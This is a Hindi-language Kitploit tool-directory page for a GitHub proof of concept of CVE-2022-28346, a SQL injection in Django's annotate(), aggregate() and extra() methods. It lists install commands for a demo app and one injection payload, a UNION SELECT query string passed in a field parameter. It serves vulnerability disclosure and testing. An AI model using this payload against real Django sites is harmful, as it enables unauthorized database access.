Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-28346 — Django 2.2 (2.2.28 से पहले), 3.2 (3.2.13 से पहले) और 4.0 (4.0.4 से पहले) में एक समस्या खोजी गई। QuerySet.annotate(), aggregate() और extra() विधियाँ, **kwargs के रूप में पारित एक विशेष रूप से तैयार की गई डिक्शनरी (डिक्शनरी विस्तार के साथ) के माध्यम से कॉलम एलियासेस में SQL injection के प्रति संवेदनशील हैं। | Kitploit
उपकरण/GitHubGitHub/vincentinttsh/cve-2022-28346
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटाबेस सुरक्षा
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Django 2.2 (2.2.28 से पहले), 3.2 (3.2.13 से पहले) और 4.0 (4.0.4 से पहले) में एक समस्या खोजी गई। QuerySet.annotate(), aggregate() और extra() विधियाँ, **kwargs के रूप में पारित एक विशेष रूप से तैयार की गई डिक्शनरी (डिक्शनरी विस्तार के साथ) के माध्यम से कॉलम एलियासेस में SQL injection के प्रति संवेदनशील हैं।

4 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2022-28346 PoC Tweet

प्रभाव:

  • QuerySet.annotate(), aggregate(), और extra() में संभावित SQL इंजेक्शन।

स्थापना

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

संदर्भ

CVE Mitre

Django

टूल डाउनलोड करें